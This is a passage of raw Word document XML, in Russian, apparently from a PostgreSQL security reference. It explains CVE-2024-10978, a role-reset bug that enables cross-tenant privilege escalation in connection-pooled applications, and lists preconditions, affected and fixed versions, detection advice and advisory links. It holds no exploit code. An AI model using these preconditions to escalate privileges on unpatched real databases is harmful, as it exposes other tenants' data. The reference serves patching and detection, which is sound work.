        <w:t xml:space="preserve"> Точная механика — баг в коде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/init/miscinit.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SetUserIdAndSecContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RestoreUserContext</w:t>
      </w:r>
      <w:r>
        <w:t>) и в plan-cache invalidation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/cache/plancache.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). До фикса reset-path не вызывал invalidation плана при определённых exception-сценариях; план продолжал использовать «застрявший» role-ID. Фикс — добавление explicit invalidation плана при exception-rollback в SECURITY DEFINER функции и при ошибках в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE4525" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Корневая причина — общая для PostgreSQL: plan-cache оптимизирует производительность, но при изменении контекста (current_role, current_setting, search_path) invalidation должен срабатывать на всех путях, включая error-path. Обнаружение требует анализа sequence запросов с учётом session state, что сложно для статической детекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F86B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEFD81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фикс:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (выпущены 14 ноября 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78402975" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50836769" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   login-роль (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pool_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) должна иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на хотя бы две разные роли (типично — на все tenant-роли)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23155D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   целевые роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_B</w:t>
      </w:r>
      <w:r>
        <w:t>) имеют разные права на данные (это и эксплуатируется)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7720B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это «горизонтальная» эскалация между tenant-ами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DEE0FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A57AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований. plan-cache всегда включён (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plan_cache_mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> влияет только на стратегию, не на наличие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B254CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приложение использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request с connection-pooled session. Без pool (новое соединение на каждый запрос) баг не эксплуатируется — reset-path обходится через DISCONNECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C04DA"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27360BCA"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5030ADE"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0C4C13C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="02D0297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6F1AEC"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8C812" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10978</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="639762E2"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D291CC"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2FE600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.2 (Medium, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="68069BA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B9614D"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D6A1B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 ноября 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="075834B9"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8F5706" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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0A61D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4DFA994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EB58EC"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BF4D06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0158EABB"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D5FD53"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642129" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege confusion в SET ROLE / SET SESSION AUTHORIZATION reset-path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="40DDF3B5"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31AA53"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601A4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multi-tenant data leak / horizontal privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DDB4AA3"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SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный механизм PostgreSQL для делегирования прав, используется в:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB0791" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   multi-tenant приложениях (как в уязвимом коде выше — паттерн сам по себе валидный)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDE992" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   административных скриптах (DBA делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для тестирования прав application-роли)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2639BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   audit-системах (роль с правом импepсонации для проверки прав)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81F9BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки (трудно отделить от легитимного использования):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56A35F"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возрастающее число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> записей с следующим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от той же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> но разных tenant-context — типично для уязвимого приложения, не атаки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сама атака не оставляет уникальных артефактов в SQL-логах</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что использует штатные команды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C659F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Лучший индикатор — application-level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: cross-tenant queries возвращают неожиданные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в результатах. Логи приложения должны валидировать, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в response соответствует JWT-claim запроса. При несовпадении — алерт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557531B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   На версиях PG ≤ 17.0 / 16.4 / 15.8 / 14.13 / 13.16 / 12.20 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log с фокусом на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функций под именами SECURITY DEFINER в multi-tenant приложении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C01181E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки PG до фикса 14.11.2024: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4770EA42"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106FA30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>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3B8BB43"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0F4B92F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="07D5D755"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D7C9EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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6AA09A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0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A0186D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2AFF70C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B2812A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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120552" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.4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62E531" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="66C2D354"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9746CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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8440F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.8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BD7F21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="177BD55B"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321C26"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6EC775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.13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E68B54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4EAC67F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B4D49C"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4D2244" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.16</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284A05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7AA898C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1CAFB7"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8DE289" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.20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38808F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30FB1325" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На версиях PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — reset-path вызывает корректную plan-cache invalidation, current_role гарантированно сбрасывается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A331B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27276349" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же CVE-2024-10978 с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обхода RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (не получения роли). Граница: 3.13.1 — горизонтальная эскалация между tenant-ами; 3.17.3 — чтение данных в обход policy через тот же баг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D189E25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанный паттерн mis-configuration: SECURITY DEFINER без явного SET role может стать каналом для CVE-2024-10978 (трудно отделить эффекты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477B4E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг не помогает (CVE требует sequence в pool-сессии, не одного multi-statement), но релевантен для атак на ROLLBACK/COMMIT отдельной транзакции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62E180" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст 14.11.2024 (CVE-2024-10976, 10977, 10978, 10979 как batch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71A319" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 (Принцип наименьших привилегий)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендации по multi-tenant архитектуре без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через application-level filtering и connection-per-tenant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AC761" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FB127" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2024-10978 — https://www.postgresql.org/support/security/CVE-2024-10978/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BE1A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2024-10978 — https://nvd.nist.gov/vuln/detail/CVE-2024-10978</w:t>
      </w:r>
    </w:p>
